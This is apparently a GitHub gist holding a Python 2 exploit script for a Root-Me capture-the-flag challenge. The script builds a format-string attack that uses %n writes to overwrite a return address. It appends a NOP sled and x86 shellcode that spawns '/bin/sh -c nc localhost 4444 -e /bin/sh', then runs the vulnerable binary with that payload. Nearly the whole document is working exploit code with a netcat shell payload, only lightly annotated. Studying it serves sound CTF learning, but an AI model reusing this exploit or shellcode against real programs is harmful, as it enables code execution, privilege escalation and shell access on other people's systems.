@thehackerish
Created August 1, 2016 10:47
import socket, struct, pipes, subprocess
from time import sleep
import sys, os
# Remote endpoint of the challenge. Not referenced anywhere in the visible
# code: the script below runs the binary locally through subprocess.call.
HOST, PORT = ('challenge03.root-me.org', 2223)
# Challenge-specific addresses/offsets taken as given by the author; nothing
# visible here derives them. RET is packed (RET+0..RET+3) into the payload,
# BUFFER_ADDR feeds shellcode_addr, FMT_OFFSET numbers the '$n' directives.
RET = 0x08049754
BUFFER_ADDR = 0x8049880
FMT_OFFSET = 145
# Raw machine-code bytes appended verbatim to the end of `payload` below
# (a Python 2 str, i.e. bytes).
SHELLCODE = '\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x6e\x63\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68'
def little_endian(addr):
    """Pack *addr* as a 4-byte unsigned integer, least-significant byte first.

    Args:
        addr: integer in 0..2**32-1 (``struct.error`` is raised outside that range).

    Returns:
        The 4-byte ``'<L'`` encoding (``str`` under Python 2, ``bytes`` under 3).
    """
    return struct.pack('<L', addr)
def big_endian(addr):
    """Pack *addr* as a 4-byte unsigned integer, most-significant byte first.

    Args:
        addr: integer in 0..2**32-1 (``struct.error`` is raised outside that range).

    Returns:
        The 4-byte ``'>L'`` encoding (``str`` under Python 2, ``bytes`` under 3).
    """
    return struct.pack('>L', addr)
def get_positive(number1, number2):
    """Return ``number1 - number2``, adding 256 when that difference is not positive.

    For byte-sized inputs (0..255) the result is therefore always in 1..256;
    an exact match (difference 0) yields 256, never 0.

    Args:
        number1: the current value.
        number2: the value to subtract.

    Returns:
        A strictly positive integer for inputs within one byte of each other.
    """
    delta = number1 - number2
    if delta > 0:
        return delta
    # 16**2 == 256: wrap one byte upward so the result is never <= 0.
    return delta + 16**2
def get_bytes_number(addr):
    """Return the four byte-wise deltas of *addr* in little-endian order.

    The first entry is ``get_positive(byte0, 16)``; every following entry is
    ``get_positive(byte_i, byte_{i-1})``, i.e. the positive (mod 256) step
    from the previous byte value to the current one.

    Args:
        addr: integer packed via ``little_endian`` (0..2**32-1).

    Returns:
        A list of four integers, each in 1..256.
    """
    packed = little_endian(addr)
    values = [ord(ch) for ch in packed]
    # Each byte is compared against its predecessor; the first against 16.
    predecessors = [16] + values[:-1]
    return [get_positive(cur, prev) for cur, prev in zip(values, predecessors)]
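def recvall(sock):
    """Read from *sock* until the peer closes the connection.

    Data is received in 1024-byte chunks on the socket passed in (the
    original body read from an unrelated module-level name instead of its
    argument, which raised ``NameError``).

    Args:
        sock: a connected socket object exposing ``recv``.

    Returns:
        Everything received, concatenated (``bytes``; ``str`` under Python 2).
        Empty if the peer closes immediately.
    """
    chunks = []
    while True:
        buff = sock.recv(1024)
        if not buff:
            break
        chunks.append(buff)
    # Join once at the end instead of repeated += (quadratic on some runtimes).
    return b''.join(chunks)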
def hexify(chaine):
    """Concatenate ``hex(ord(c))`` for every character of *chaine*.

    Note the pieces are joined with no separator, so ``'AB'`` becomes
    ``'0x410x42'``.

    Args:
        chaine: a string (Python 2 str / Python 3 text).

    Returns:
        The joined hexadecimal representations; ``''`` for empty input.
    """
    return ''.join(map(hex, map(ord, chaine)))
# --- payload assembly (Python 2: str is bytes, `print` is a statement) ---
# Value whose bytes drive the '%n' directives below (see get_bytes_number);
# the "+ 10" is a tuned constant that nothing visible here derives.
shellcode_addr = BUFFER_ADDR + 10
# Per-byte field widths in little-endian order; each value is in 1..256.
offsets = get_bytes_number(shellcode_addr)
# One '%<width>x%<pos>$n' pair per byte, positions FMT_OFFSET..FMT_OFFSET+3.
offsets_payload = ''.join('%'+str(offsets[i])+'x'+'%'+str((FMT_OFFSET+i))+'$n' for i in range(4))
# RET, RET+1, RET+2, RET+3, each packed '<L' (16 bytes total).
ret_payload = ''.join(little_endian(RET + i) for i in range(4))
# Layout: 1 filler byte, 16 bytes of addresses, the format directives,
# 20 bytes of 0x90, then SHELLCODE.
payload = 'A' + ret_payload + offsets_payload + '\x90'*20 + SHELLCODE
print payload
#subprocess.call("gdb --args /challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)
# The payload is passed as a single argument through a shell; pipes.quote
# (superseded by shlex.quote) keeps it one token. subprocess.call([path, payload])
# would avoid the shell entirely. The path is challenge-specific.
subprocess.call("/challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)